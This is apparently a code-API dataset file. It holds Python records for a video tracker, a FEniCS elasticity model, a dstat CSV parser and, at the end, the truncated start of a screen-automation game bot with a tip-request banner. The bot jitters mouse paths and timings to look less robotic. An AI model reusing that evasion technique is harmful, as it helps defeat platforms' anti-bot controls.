                self.writer.write(ori_im)
            #------------------------------------------------------------------------
            # Exporting data processing
            # This processes each frame tracking data and appends it to the results
            # array that will be exported
            if len(outputs) > 0:
                # Tracking data for frame
                tracking_array_i = outputs
                # Prepend the (zero-based) frame number to each track row.
                frame_num_array_i = np.full((tracking_array_i.shape[0], 1), idx_frame - 1)
                results_array_i = np.append(frame_num_array_i, tracking_array_i, 1)
                # Add frame data to results array
                self.results_array = np.append(self.results_array, results_array_i,0)
            #------------------------------------------------------------------------
            # Logging
            self.logger.info("frame: {},time: {:.03f}s, fps: {:.03f}, detection numbers: {}, tracking numbers: {}" \
                .format(idx_frame - 1, end - start, 1 / (end - start), bbox_xywh.shape[0], len(outputs)))\
            # Make it shorter for piloting
            # if idx_frame > 10:
            #     break
        #----------------------------------------------------------------------------
        # Export outputs
        # Turn to pandas and export csv
        if (os.path.exists(self.args.save_path) & (not self.args.no_export)):
            pd.DataFrame(self.results_array,
                        columns= ['frame', 'xi', 'yi', 'xj', 'yj','obj_id', 'class'])\
                .astype({'frame': int,
                        'xi': int,
                        'yi': int,
                        'xj': int,
                        'yj': int,
                        'obj_id': int,
                        'class': int
                        # 'conf': float,
                        })\
                .to_csv(self.save_results_path, index = False)
#-------------------------------------------------------------------------------------
def parse_args(argv=None):
    """Parse command-line options for the tracker.

    Parameters:
        argv: optional list of argument strings. Defaults to None, in which
            case argparse reads sys.argv[1:] (so existing ``parse_args()``
            callers are unaffected). Passing an explicit list makes the
            function unit-testable.

    Returns:
        argparse.Namespace with the parsed options.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("VIDEO_PATH", type=str)
    parser.add_argument("--config_detection", type=str, default="./configs/yolov3.yaml")
    parser.add_argument("--config_deepsort", type=str, default="./configs/deep_sort.yaml")
    parser.add_argument("--display", action="store_true")
    parser.add_argument("--frame_interval", type=int, default=1)
    parser.add_argument("--display_width", type=int, default=800)
    parser.add_argument("--display_height", type=int, default=600)
    parser.add_argument("--save_path", type=str, default="../output/")
    # "--no-export" with no value sets no_export=True; absent -> False.
    parser.add_argument("--no-export", dest='no_export', nargs='?', const=True, default=False)
    parser.add_argument("--cpu", dest="use_cuda", action="store_false", default=True)
    # Use a real int default instead of the string "-1" (argparse would
    # otherwise have to re-parse the string through type=int).
    parser.add_argument("--camera", action="store", dest="cam", type=int, default=-1)
    return parser.parse_args(argv)
if __name__ == "__main__":
    # Wall-clock timer for the whole run.
    start_time = time.time()
    args = parse_args()
    # Merge the detector and tracker YAML files into one config object.
    cfg = get_config()
    cfg.merge_from_file(args.config_detection)
    cfg.merge_from_file(args.config_deepsort)
    # VideoTracker is a context manager: it acquires/releases the video
    # capture and writer resources around run().
    with VideoTracker(cfg, args, video_path=args.VIDEO_PATH) as vdo_trk:
        vdo_trk.run()
    print("--- %s seconds ---" % (time.time() - start_time))
| [
"numpy.isin",
"argparse.ArgumentParser",
"cv2.VideoWriter_fourcc",
"numpy.empty",
"utils.draw.draw_boxes",
"os.path.isfile",
"cv2.VideoWriter",
"cv2.imshow",
"os.path.join",
"numpy.full",
"pandas.DataFrame",
"cv2.cvtColor",
"os.path.exists",
"numpy.append",
"utils.log.get_logger",
"os.... | [((8239, 8264), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (8262, 8264), False, 'import argparse\n'), ((9265, 9276), 'time.time', 'time.time', ([], {}), '()\n', (9274, 9276), False, 'import time\n'), ((9311, 9323), 'utils.parser.get_config', 'get_config', ([], {}), '()\n', (9321, 9323), False, 'from utils.parser import get_config\n'), ((905, 923), 'utils.log.get_logger', 'get_logger', (['"""root"""'], {}), "('root')\n", (915, 923), False, 'from utils.log import get_logger\n'), ((1490, 1528), 'detector.build_detector', 'build_detector', (['cfg'], {'use_cuda': 'use_cuda'}), '(cfg, use_cuda=use_cuda)\n', (1504, 1528), False, 'from detector import build_detector\n'), ((1553, 1590), 'deep_sort.build_tracker', 'build_tracker', (['cfg'], {'use_cuda': 'use_cuda'}), '(cfg, use_cuda=use_cuda)\n', (1566, 1590), False, 'from deep_sort import build_tracker\n'), ((3700, 3722), 'numpy.empty', 'np.empty', ([], {'shape': '(0, 7)'}), '(shape=(0, 7))\n', (3708, 3722), True, 'import numpy as np\n'), ((970, 995), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (993, 995), False, 'import torch\n'), ((1033, 1105), 'warnings.warn', 'warnings.warn', (['"""Running in cpu mode which maybe very slow!"""', 'UserWarning'], {}), "('Running in cpu mode which maybe very slow!', UserWarning)\n", (1046, 1105), False, 'import warnings\n'), ((1152, 1194), 'cv2.namedWindow', 'cv2.namedWindow', (['"""test"""', 'cv2.WINDOW_NORMAL'], {}), "('test', cv2.WINDOW_NORMAL)\n", (1167, 1194), False, 'import cv2\n'), ((1207, 1272), 'cv2.resizeWindow', 'cv2.resizeWindow', (['"""test"""', 'args.display_width', 'args.display_height'], {}), "('test', args.display_width, args.display_height)\n", (1223, 1272), False, 'import cv2\n'), ((1383, 1409), 'cv2.VideoCapture', 'cv2.VideoCapture', (['args.cam'], {}), '(args.cam)\n', (1399, 1409), False, 'import cv2\n'), ((1447, 1465), 'cv2.VideoCapture', 'cv2.VideoCapture', ([], {}), '()\n', (1463, 1465), False, 
'import cv2\n'), ((1922, 1953), 'os.path.isfile', 'os.path.isfile', (['self.video_path'], {}), '(self.video_path)\n', (1936, 1953), False, 'import os\n'), ((2261, 2308), 'os.makedirs', 'os.makedirs', (['self.args.save_path'], {'exist_ok': '(True)'}), '(self.args.save_path, exist_ok=True)\n', (2272, 2308), False, 'import os\n'), ((2790, 2846), 'os.path.join', 'os.path.join', (['self.args.save_path', 'video_output_filename'], {}), '(self.args.save_path, video_output_filename)\n', (2802, 2846), False, 'import os\n'), ((2884, 2935), 'os.path.join', 'os.path.join', (['self.args.save_path', 'results_filename'], {}), '(self.args.save_path, results_filename)\n', (2896, 2935), False, 'import os\n'), ((3935, 3946), 'time.time', 'time.time', ([], {}), '()\n', (3944, 3946), False, 'import time\n'), ((4008, 4047), 'cv2.cvtColor', 'cv2.cvtColor', (['ori_im', 'cv2.COLOR_BGR2RGB'], {}), '(ori_im, cv2.COLOR_BGR2RGB)\n', (4020, 4047), False, 'import cv2\n'), ((4674, 4704), 'numpy.isin', 'np.isin', (['cls_ids', 'keep_classes'], {}), '(cls_ids, keep_classes)\n', (4681, 4704), True, 'import numpy as np\n'), ((5805, 5816), 'time.time', 'time.time', ([], {}), '()\n', (5814, 5816), False, 'import time\n'), ((7516, 7551), 'os.path.exists', 'os.path.exists', (['self.args.save_path'], {}), '(self.args.save_path)\n', (7530, 7551), False, 'import os\n'), ((2439, 2461), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (2455, 2461), False, 'import os\n'), ((2999, 3034), 'os.path.exists', 'os.path.exists', (['self.args.save_path'], {}), '(self.args.save_path)\n', (3013, 3034), False, 'import os\n'), ((3090, 3121), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'avc1'"], {}), "(*'avc1')\n", (3112, 3121), False, 'import cv2\n'), ((3152, 3239), 'cv2.VideoWriter', 'cv2.VideoWriter', (['self.save_video_path', 'fourcc', '(20)', '(self.im_width, self.im_height)'], {}), '(self.save_video_path, fourcc, 20, (self.im_width, self.\n im_height))\n', (3167, 3239), False, 'import 
cv2\n'), ((5581, 5622), 'utils.draw.draw_boxes', 'draw_boxes', (['ori_im', 'bbox_xyxy', 'identities'], {}), '(ori_im, bbox_xyxy, identities)\n', (5591, 5622), False, 'from utils.draw import draw_boxes\n'), ((5880, 5906), 'cv2.imshow', 'cv2.imshow', (['"""test"""', 'ori_im'], {}), "('test', ori_im)\n", (5890, 5906), False, 'import cv2\n'), ((5923, 5937), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5934, 5937), False, 'import cv2\n'), ((5967, 6002), 'os.path.exists', 'os.path.exists', (['self.args.save_path'], {}), '(self.args.save_path)\n', (5981, 6002), False, 'import os\n'), ((6590, 6644), 'numpy.full', 'np.full', (['(tracking_array_i.shape[0], 1)', '(idx_frame - 1)'], {}), '((tracking_array_i.shape[0], 1), idx_frame - 1)\n', (6597, 6644), True, 'import numpy as np\n'), ((6679, 6728), 'numpy.append', 'np.append', (['frame_num_array_i', 'tracking_array_i', '(1)'], {}), '(frame_num_array_i, tracking_array_i, 1)\n', (6688, 6728), True, 'import numpy as np\n'), ((6833, 6882), 'numpy.append', 'np.append', (['self.results_array', 'results_array_i', '(0)'], {}), '(self.results_array, results_array_i, 0)\n', (6842, 6882), True, 'import numpy as np\n'), ((9551, 9562), 'time.time', 'time.time', ([], {}), '()\n', (9560, 9562), False, 'import time\n'), ((7594, 7692), 'pandas.DataFrame', 'pd.DataFrame', (['self.results_array'], {'columns': "['frame', 'xi', 'yi', 'xj', 'yj', 'obj_id', 'class']"}), "(self.results_array, columns=['frame', 'xi', 'yi', 'xj', 'yj',\n 'obj_id', 'class'])\n", (7606, 7692), True, 'import pandas as pd\n')] |
"""Poisson problem PDE definition"""
import math
import numpy as np
import mshr
import fenics as fa
from .poisson import Poisson
from .. import arguments
from ..graph.visualization import scalar_field_paraview, save_solution
class PoissonRobot(Poisson):
    """Plane-strain neo-Hookean elasticity problem on a 0.5 x 10 rectangular
    "robot" domain, built on top of the generic Poisson problem class.

    The bottom edge is clamped and the left/right edges are given a
    prescribed vertical displacement that grows linearly with height
    (u_y = 0.1 * x[1]).
    """

    def __init__(self, args):
        """Initialise the base problem and label this instance 'robot'."""
        super(PoissonRobot, self).__init__(args)
        self.name = 'robot'

    def _build_mesh(self):
        """Create a 0.5 x 10 rectangle mesh with 2 x 20 'crossed' cells."""
        args = self.args  # NOTE(review): only used by the commented-out loader below
        self.width = 0.5
        # mesh = fa.Mesh(args.root_path + '/' + args.solutions_path + '/saved_mesh/mesh_robot.xml')
        mesh = fa.RectangleMesh(fa.Point(0, 0), fa.Point(
            self.width, 10), 2, 20, 'crossed')
        self.mesh = mesh

    def _build_function_space(self):
        """Set up function spaces, boundary markers, measures and the
        Dirichlet boundary conditions."""
        width = self.width

        # Boundary subdomains; Exterior covers the whole outer boundary.
        # NOTE(review): the fa.near(x[0], 1) term can never hold on this
        # 0.5-wide domain — presumably a leftover from another geometry.
        class Exterior(fa.SubDomain):
            def inside(self, x, on_boundary):
                return on_boundary and (
                    fa.near(x[1], 10) or
                    fa.near(x[0], 1) or
                    fa.near(x[0], 0) or
                    fa.near(x[1], 0))

        class Left(fa.SubDomain):
            def inside(self, x, on_boundary):
                return on_boundary and fa.near(x[0], 0)

        class Right(fa.SubDomain):
            def inside(self, x, on_boundary):
                return on_boundary and fa.near(x[0], width)

        class Bottom(fa.SubDomain):
            def inside(self, x, on_boundary):
                return on_boundary and fa.near(x[1], 0)

        class Top(fa.SubDomain):
            def inside(self, x, on_boundary):
                return on_boundary and fa.near(x[1], 10)

        self.exteriors_dic = {
            'left': Left(), 'right': Right(), 'bottom': Bottom(), 'top': Top()}
        self.exterior = Exterior()
        # P1 vector space for displacements, DG0 scalar space for per-cell data.
        self.V = fa.VectorFunctionSpace(self.mesh, 'P', 1)
        self.W = fa.FunctionSpace(self.mesh, 'DG', 0)
        # Facet function used to tag each boundary with an integer id.
        self.sub_domains = fa.MeshFunction(
            "size_t", self.mesh, self.mesh.topology().dim() - 1)
        self.sub_domains.set_all(0)
        self.boundaries_id_dic = {'left': 1, 'right': 2, 'bottom': 3, 'top': 4}
        self.left = Left()
        self.left.mark(self.sub_domains, 1)
        self.right = Right()
        self.right.mark(self.sub_domains, 2)
        self.bottom = Bottom()
        self.bottom.mark(self.sub_domains, 3)
        self.top = Top()
        self.top.mark(self.sub_domains, 4)
        self.normal = fa.FacetNormal(self.mesh)
        self.ds = fa.Measure("ds")(subdomain_data=self.sub_domains)
        self.bcs = [self.bottom]  # NOTE(review): immediately overwritten below
        # Dirichlet data: clamp the bottom, pull left/right edges upward
        # proportionally to height (u_y = 0.1 * x[1]).
        boundaries = [self.bottom, self.left, self.right]
        boundary_fn = [fa.Constant((0., 0.)),
                       fa.Expression(("0", ".1*x[1]"), degree=1),
                       fa.Expression(("0", ".1*x[1]"), degree=1)]
        self.bcs = []
        for i in range(len(boundaries)):
            boundary_bc = fa.DirichletBC(self.V, boundary_fn[i], boundaries[i])
            self.bcs = self.bcs + [boundary_bc]

    def _set_detailed_boundary_flags(self):
        """Build 0/1 indicator arrays over the dofs for each constrained
        boundary component: [bottom, left_x, left_y, right_x, right_y].

        The even/odd counters assume the x- and y-components of each vector
        dof alternate in the dof ordering — TODO confirm against the FEniCS
        dof layout used by self.coo_dof.
        """
        x1 = self.coo_dof[:, 0]
        x2 = self.coo_dof[:, 1]
        # [bottom, left_x, left_y, right_x, right_y]
        boundary_flags_list = [np.zeros(self.num_dofs) for i in range(5)]
        counter_left = 0
        counter_right = 0
        for i in range(self.num_dofs):
            if x2[i] < 1e-10:
                # Any dof sitting on the bottom edge.
                boundary_flags_list[0][i] = 1
            else:
                if x1[i] < 1e-10:
                    if counter_left % 2 == 0:
                        boundary_flags_list[1][i] = 1
                    else:
                        boundary_flags_list[2][i] = 1
                    counter_left += 1
                if x1[i] > self.width - 1e-10:
                    if counter_right % 2 == 0:
                        boundary_flags_list[3][i] = 1
                    else:
                        boundary_flags_list[4][i] = 1
                    counter_right += 1
        self.boundary_flags_list = boundary_flags_list

    # Deformation gradient F = I + grad(u)
    def DeformationGradient(self, u):
        I = fa.Identity(u.geometric_dimension())
        return I + fa.grad(u)

    # Right Cauchy-Green tensor C = F^T F
    def RightCauchyGreen(self, F):
        return F.T * F

    # Neo-Hookean Energy
    def _energy_density(self, u):
        """Plane-strain neo-Hookean energy density for displacement u
        (Young's modulus 100, Poisson ratio 0.3)."""
        young_mod = 100
        poisson_ratio = 0.3
        shear_mod = young_mod / (2 * (1 + poisson_ratio))
        bulk_mod = young_mod / (3 * (1 - 2 * poisson_ratio))
        d = u.geometric_dimension()  # NOTE(review): unused
        F = self.DeformationGradient(u)
        F = fa.variable(F)
        J = fa.det(F)
        I1 = fa.tr(self.RightCauchyGreen(F))
        # Plane strain assumption
        Jinv = J**(-2 / 3)
        energy = ((shear_mod / 2) * (Jinv * (I1 + 1) - 3) +
                  (bulk_mod / 2) * (J - 1)**2)
        return energy

    def check_energy(self, dof_data):
        """Load raw dof values into a V-function and print its total energy."""
        u = fa.Function(self.V)
        u.vector()[:] = dof_data
        energy = self.energy(u)
        print(energy)

    def energy(self, u):
        """Total strain energy: integral of the energy density over the mesh."""
        return fa.assemble(self._energy_density(u) * fa.dx)

    def solve_problem_variational_form(self):
        """Solve the nonlinear elasticity problem (first variation of the
        energy = 0) under self.bcs and return the displacement."""
        u = fa.Function(self.V)
        du = fa.TrialFunction(self.V)
        v = fa.TestFunction(self.V)
        E = self._energy_density(u) * fa.dx
        # Residual (first variation) and its Jacobian for Newton's method.
        dE = fa.derivative(E, u, v)
        jacE = fa.derivative(dE, u, du)
        fa.solve(dE == 0, u, self.bcs, J=jacE)
        return u

    def compute_operators(self):
        """Probe each dof with a unit vector to assemble the linear maps
        from dof values to the four DG0 components of the deformation
        gradient; saves them to '<numpy_path>/robot/F.npy' and returns them."""
        v = fa.Function(self.V)
        w = fa.Function(self.W)  # NOTE(review): unused
        F00 = []
        F01 = []
        F10 = []
        F11 = []
        for i in range(self.num_dofs):
            # Unit vector in dof i yields one column of each operator.
            v.vector()[:] = 0
            v.vector()[i] = 1
            F = self.DeformationGradient(v)
            f00 = fa.project(F[0, 0], self.W)
            f01 = fa.project(F[0, 1], self.W)
            f10 = fa.project(F[1, 0], self.W)
            f11 = fa.project(F[1, 1], self.W)
            F00.append(np.array(f00.vector()))
            F01.append(np.array(f01.vector()))
            F10.append(np.array(f10.vector()))
            F11.append(np.array(f11.vector()))
        # Diagonal components carry the identity from F = I + grad(u);
        # subtract it here. Do not forget to add 1 later.
        F00 = np.transpose(np.array(F00)) - 1
        F01 = np.transpose(np.array(F01))
        F10 = np.transpose(np.array(F10))
        F11 = np.transpose(np.array(F11)) - 1
        F = [F00, F01, F10, F11]
        np.save(self.args.root_path + '/' +
                self.args.numpy_path + '/robot/' + 'F' + '.npy', F)
        return F

    def compute_areas(self):
        """Return the integral of every DG0 basis function, i.e. cell areas."""
        w = fa.Function(self.W)
        area = np.zeros(self.W.dim())
        for i in range(self.W.dim()):
            w.vector()[:] = 0
            w.vector()[i] = 1
            area[i] = fa.assemble(w * fa.dx)
        return area

    def debug(self):
        """Ad-hoc debugging helper.

        NOTE(review): `test` below is undefined — calling this raises
        NameError; probably meant `v` or `w`.
        """
        v = fa.Function(self.V)
        v.vector()[0] = 1
        w = fa.Function(self.W)
        w.vector()[20] = 1
        print(np.array(test.vector()))
if __name__ == '__main__':
    # Smoke test: build the robot problem, solve it, report the energy and
    # store the solution for visualisation.
    args = arguments.args
    pde = PoissonRobot(args)
    u = pde.solve_problem_variational_form()
    print(pde.energy(u))
    save_solution(args, u, 'u')
| [
"fenics.project",
"fenics.TrialFunction",
"fenics.Function",
"fenics.near",
"fenics.FunctionSpace",
"fenics.assemble",
"fenics.FacetNormal",
"fenics.det",
"numpy.save",
"fenics.Point",
"fenics.DirichletBC",
"fenics.variable",
"fenics.Constant",
"fenics.grad",
"fenics.VectorFunctionSpace"... | [((1748, 1789), 'fenics.VectorFunctionSpace', 'fa.VectorFunctionSpace', (['self.mesh', '"""P"""', '(1)'], {}), "(self.mesh, 'P', 1)\n", (1770, 1789), True, 'import fenics as fa\n'), ((1807, 1843), 'fenics.FunctionSpace', 'fa.FunctionSpace', (['self.mesh', '"""DG"""', '(0)'], {}), "(self.mesh, 'DG', 0)\n", (1823, 1843), True, 'import fenics as fa\n'), ((2384, 2409), 'fenics.FacetNormal', 'fa.FacetNormal', (['self.mesh'], {}), '(self.mesh)\n', (2398, 2409), True, 'import fenics as fa\n'), ((4489, 4503), 'fenics.variable', 'fa.variable', (['F'], {}), '(F)\n', (4500, 4503), True, 'import fenics as fa\n'), ((4516, 4525), 'fenics.det', 'fa.det', (['F'], {}), '(F)\n', (4522, 4525), True, 'import fenics as fa\n'), ((4813, 4832), 'fenics.Function', 'fa.Function', (['self.V'], {}), '(self.V)\n', (4824, 4832), True, 'import fenics as fa\n'), ((5065, 5084), 'fenics.Function', 'fa.Function', (['self.V'], {}), '(self.V)\n', (5076, 5084), True, 'import fenics as fa\n'), ((5098, 5122), 'fenics.TrialFunction', 'fa.TrialFunction', (['self.V'], {}), '(self.V)\n', (5114, 5122), True, 'import fenics as fa\n'), ((5135, 5158), 'fenics.TestFunction', 'fa.TestFunction', (['self.V'], {}), '(self.V)\n', (5150, 5158), True, 'import fenics as fa\n'), ((5216, 5238), 'fenics.derivative', 'fa.derivative', (['E', 'u', 'v'], {}), '(E, u, v)\n', (5229, 5238), True, 'import fenics as fa\n'), ((5254, 5278), 'fenics.derivative', 'fa.derivative', (['dE', 'u', 'du'], {}), '(dE, u, du)\n', (5267, 5278), True, 'import fenics as fa\n'), ((5287, 5325), 'fenics.solve', 'fa.solve', (['(dE == 0)', 'u', 'self.bcs'], {'J': 'jacE'}), '(dE == 0, u, self.bcs, J=jacE)\n', (5295, 5325), True, 'import fenics as fa\n'), ((5389, 5408), 'fenics.Function', 'fa.Function', (['self.V'], {}), '(self.V)\n', (5400, 5408), True, 'import fenics as fa\n'), ((5421, 5440), 'fenics.Function', 'fa.Function', (['self.W'], {}), '(self.W)\n', (5432, 5440), True, 'import fenics as fa\n'), ((6282, 6373), 
'numpy.save', 'np.save', (["(self.args.root_path + '/' + self.args.numpy_path + '/robot/' + 'F' + '.npy')", 'F'], {}), "(self.args.root_path + '/' + self.args.numpy_path + '/robot/' + 'F' +\n '.npy', F)\n", (6289, 6373), True, 'import numpy as np\n'), ((6445, 6464), 'fenics.Function', 'fa.Function', (['self.W'], {}), '(self.W)\n', (6456, 6464), True, 'import fenics as fa\n'), ((6700, 6719), 'fenics.Function', 'fa.Function', (['self.V'], {}), '(self.V)\n', (6711, 6719), True, 'import fenics as fa\n'), ((6758, 6777), 'fenics.Function', 'fa.Function', (['self.W'], {}), '(self.W)\n', (6769, 6777), True, 'import fenics as fa\n'), ((575, 589), 'fenics.Point', 'fa.Point', (['(0)', '(0)'], {}), '(0, 0)\n', (583, 589), True, 'import fenics as fa\n'), ((591, 615), 'fenics.Point', 'fa.Point', (['self.width', '(10)'], {}), '(self.width, 10)\n', (599, 615), True, 'import fenics as fa\n'), ((2428, 2444), 'fenics.Measure', 'fa.Measure', (['"""ds"""'], {}), "('ds')\n", (2438, 2444), True, 'import fenics as fa\n'), ((2593, 2616), 'fenics.Constant', 'fa.Constant', (['(0.0, 0.0)'], {}), '((0.0, 0.0))\n', (2604, 2616), True, 'import fenics as fa\n'), ((2639, 2680), 'fenics.Expression', 'fa.Expression', (["('0', '.1*x[1]')"], {'degree': '(1)'}), "(('0', '.1*x[1]'), degree=1)\n", (2652, 2680), True, 'import fenics as fa\n'), ((2705, 2746), 'fenics.Expression', 'fa.Expression', (["('0', '.1*x[1]')"], {'degree': '(1)'}), "(('0', '.1*x[1]'), degree=1)\n", (2718, 2746), True, 'import fenics as fa\n'), ((2837, 2890), 'fenics.DirichletBC', 'fa.DirichletBC', (['self.V', 'boundary_fn[i]', 'boundaries[i]'], {}), '(self.V, boundary_fn[i], boundaries[i])\n', (2851, 2890), True, 'import fenics as fa\n'), ((3132, 3155), 'numpy.zeros', 'np.zeros', (['self.num_dofs'], {}), '(self.num_dofs)\n', (3140, 3155), True, 'import numpy as np\n'), ((4068, 4078), 'fenics.grad', 'fa.grad', (['u'], {}), '(u)\n', (4075, 4078), True, 'import fenics as fa\n'), ((5670, 5697), 'fenics.project', 'fa.project', (['F[0, 
0]', 'self.W'], {}), '(F[0, 0], self.W)\n', (5680, 5697), True, 'import fenics as fa\n'), ((5716, 5743), 'fenics.project', 'fa.project', (['F[0, 1]', 'self.W'], {}), '(F[0, 1], self.W)\n', (5726, 5743), True, 'import fenics as fa\n'), ((5762, 5789), 'fenics.project', 'fa.project', (['F[1, 0]', 'self.W'], {}), '(F[1, 0], self.W)\n', (5772, 5789), True, 'import fenics as fa\n'), ((5808, 5835), 'fenics.project', 'fa.project', (['F[1, 1]', 'self.W'], {}), '(F[1, 1], self.W)\n', (5818, 5835), True, 'import fenics as fa\n'), ((6137, 6150), 'numpy.array', 'np.array', (['F01'], {}), '(F01)\n', (6145, 6150), True, 'import numpy as np\n'), ((6179, 6192), 'numpy.array', 'np.array', (['F10'], {}), '(F10)\n', (6187, 6192), True, 'import numpy as np\n'), ((6623, 6645), 'fenics.assemble', 'fa.assemble', (['(w * fa.dx)'], {}), '(w * fa.dx)\n', (6634, 6645), True, 'import fenics as fa\n'), ((6091, 6104), 'numpy.array', 'np.array', (['F00'], {}), '(F00)\n', (6099, 6104), True, 'import numpy as np\n'), ((6221, 6234), 'numpy.array', 'np.array', (['F11'], {}), '(F11)\n', (6229, 6234), True, 'import numpy as np\n'), ((1145, 1161), 'fenics.near', 'fa.near', (['x[0]', '(0)'], {}), '(x[0], 0)\n', (1152, 1161), True, 'import fenics as fa\n'), ((1284, 1304), 'fenics.near', 'fa.near', (['x[0]', 'width'], {}), '(x[0], width)\n', (1291, 1304), True, 'import fenics as fa\n'), ((1428, 1444), 'fenics.near', 'fa.near', (['x[1]', '(0)'], {}), '(x[1], 0)\n', (1435, 1444), True, 'import fenics as fa\n'), ((1565, 1582), 'fenics.near', 'fa.near', (['x[1]', '(10)'], {}), '(x[1], 10)\n', (1572, 1582), True, 'import fenics as fa\n'), ((885, 902), 'fenics.near', 'fa.near', (['x[1]', '(10)'], {}), '(x[1], 10)\n', (892, 902), True, 'import fenics as fa\n'), ((926, 942), 'fenics.near', 'fa.near', (['x[0]', '(1)'], {}), '(x[0], 1)\n', (933, 942), True, 'import fenics as fa\n'), ((966, 982), 'fenics.near', 'fa.near', (['x[0]', '(0)'], {}), '(x[0], 0)\n', (973, 982), True, 'import fenics as fa\n'), ((1006, 1022), 
'fenics.near', 'fa.near', (['x[1]', '(0)'], {}), '(x[1], 0)\n', (1013, 1022), True, 'import fenics as fa\n')] |
# Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing dstat installation and cleanup functions."""
import csv
import itertools
import numpy as np
from six.moves import zip
def ParseCsvFile(fp):
  """Parse dstat results file in csv format.

  Args:
    fp: open file object (or any iterable of CSV text lines) containing
      dstat CSV output.

  Returns:
    A tuple (labels, data): labels is a list of 'label__category' column
    names and data is a 2-D float ndarray of the parsed samples.

  Raises:
    ValueError: if the input does not look like dstat CSV output or a data
      row has the wrong number of columns.
  """
  reader = csv.reader(fp)
  headers = list(itertools.islice(reader, 5))
  if len(headers) != 5:
    raise ValueError(
        'Expected exactly 5 header lines got {}\n{}'.format(
            len(headers), headers))
  if 'Dstat' not in headers[0][0]:
    raise ValueError(
        'Expected first header cell to contain "Dstat"\n{}'.format(
            headers[0]))
  if 'Host:' not in headers[2][0]:
    raise ValueError(('Expected first cell in third line to be '
                      '"Host:"\n{}').format(headers[2]))
  categories = next(reader)
  # Categories are not repeated; copy category name across columns in the
  # same category
  for i, category in enumerate(categories):
    if not categories[i]:
      categories[i] = categories[i - 1]
  labels = next(reader)
  if len(labels) != len(categories):
    raise ValueError((
        'Number of categories ({}) does not match number of '
        'labels ({})\nCategories: {}\nLabels:{}').format(
            len(categories), len(labels), categories, labels))
  # Generate unique column names of the form label__category.
  labels = ['%s__%s' % x for x in zip(labels, categories)]
  data = []
  for i, row in enumerate(reader):
    # dstat emits a trailing comma; drop the resulting empty last cell.
    if len(row) == len(labels) + 1:
      if row[-1]:
        raise ValueError(('Expected the last element of row {0} to be empty,'
                          ' found {1}').format(row, row[-1]))
      row = row[:-1]
    if len(labels) != len(row):
      raise ValueError(('Number of labels ({}) does not match number of '
                        'columns ({}) in row {}:\n{}').format(
                            len(labels), len(row), i, row))
    data.append(row)
  return labels, np.array(data, dtype=float)
def _Install(vm):
"""Installs the dstat package on the VM."""
vm.InstallPackages('dstat')
def YumInstall(vm):
  """Installs the dstat package on the VM (yum-based distributions)."""
  _Install(vm)
def AptInstall(vm):
  """Installs the dstat package on the VM (apt-based distributions)."""
  _Install(vm)
| [
"numpy.array",
"six.moves.zip",
"csv.reader",
"itertools.islice"
] | [((967, 981), 'csv.reader', 'csv.reader', (['fp'], {}), '(fp)\n', (977, 981), False, 'import csv\n'), ((999, 1026), 'itertools.islice', 'itertools.islice', (['reader', '(5)'], {}), '(reader, 5)\n', (1015, 1026), False, 'import itertools\n'), ((2632, 2659), 'numpy.array', 'np.array', (['data'], {'dtype': 'float'}), '(data, dtype=float)\n', (2640, 2659), True, 'import numpy as np\n'), ((2044, 2067), 'six.moves.zip', 'zip', (['labels', 'categories'], {}), '(labels, categories)\n', (2047, 2067), False, 'from six.moves import zip\n')] |
# -*- coding: utf-8 -*-
from src.logger import logger, loggerMapClicked
from cv2 import cv2
from os import listdir
from random import randint
from random import random
import numpy as np
import mss
import os
import subprocess
import zipfile
import pyautogui
import time
import sys
import yaml
# Load config file.
stream = open("config.yaml", 'r')
c = yaml.safe_load(stream)
ct = c['threshold']
ch = c['home']
pause = c['time_intervals']['interval_between_moviments']
pyautogui.PAUSE = pause
cat = """
_
\`*-.
) _`-.
. : `. .
: _ ' \\
; *` _. `*-._
`-.-' `-.
; ` `.
:. . \\
. \ . : .-' .
' `+.; ; ' :
: ' | ; ;-.
; ' : :`-: _.`* ;
.*' / .*' ; .*`- +' `*'
`*-* `*-* `*-*'
=========================================================================
========= 💰 Have I helped you in any way? All I ask is a tip! 🧾 =======
=========================================================================
===================== vvv BNB // BEP-20 TOKENS vvv ======================
============== <KEY> ===============
=========================================================================
>>---> Press CTRL + C to stop the bot.
>>---> Some configs can be found in the config.yaml file."""
def addRandomness(n, randomn_factor_size=None):
    """Return *n* shifted by a bounded random jitter.

    The jitter is drawn uniformly from [0, 2 * randomn_factor_size), capped
    at 5, and applied on top of n - randomn_factor_size, so the result lies
    in [n - randomn_factor_size, n - randomn_factor_size + 5].

    Parameters:
        n (int): base value.
        randomn_factor_size (float): half-width of the jitter window;
            defaults to 10% of n.

    Returns:
        int: the jittered value.
    """
    if randomn_factor_size is None:
        randomn_factor_size = 0.1 * n
    jitter = min(2 * random() * randomn_factor_size, 5)
    return int(n - randomn_factor_size + jitter)
def moveToWithRandomness(x, y, t):
    """Move the mouse cursor to roughly (x, y) in roughly t seconds.

    Both coordinates are jittered by up to +-10 px and the duration is
    extended by a random fraction of half a second, to look less robotic.
    """
    target_x = addRandomness(x, 10)
    target_y = addRandomness(y, 10)
    duration = t + random() / 2
    pyautogui.moveTo(target_x, target_y, duration)
def remove_suffix(input_string, suffix):
    """Return *input_string* with *suffix* stripped from its end, if present.

    An empty suffix (or one that does not match) leaves the string unchanged.
    """
    ends_with_it = bool(suffix) and input_string.endswith(suffix)
    if not ends_with_it:
        return input_string
    return input_string[:-len(suffix)]
def load_images(dir_path='./targets/'):
    """ Programatically loads all images of dir_path as a key:value where the
    key is the file name without the .png suffix

    Bug fix: the image path is now built from *dir_path*. Previously the
    loop hard-coded 'targets/', so a non-default dir_path listed one
    directory but read the images from another.

    Returns:
        dict: dictionary containing the loaded images as key:value pairs.
    """
    targets = {}
    for file_name in listdir(dir_path):
